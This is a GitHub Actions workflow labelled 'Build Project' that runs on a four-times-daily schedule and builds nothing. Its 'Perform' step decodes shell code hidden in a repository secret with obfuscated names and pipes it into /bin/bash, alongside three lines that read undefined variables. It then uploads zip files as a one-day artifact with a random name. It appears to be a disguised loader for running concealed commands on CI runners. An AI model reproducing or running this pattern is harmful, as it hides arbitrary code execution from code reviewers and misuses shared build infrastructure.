name: Build Project
on:
  workflow_dispatch:

  schedule:
    - cron: '32 5,11,17,23 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  agent:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Perform
        env:
          jumg8: ${{ secrets.jumg8 }}
        run: |
          printf '%s' "$jumg8" | jq -r .mf0089 | /bin/bash
          echo $nphj55 | jq -r .etwhg5653 | /bin/bash
          printf '%s' "$o4" | jq -r .wnw53 | /bin/bash
          echo $jow633 | jq -r .lyjkb3557 | /bin/bash

      - name: Upload results
        uses: actions/upload-artifact@v4
        with:
          name: UVb26zms
          path: "*.zip"
          retention-days: 1
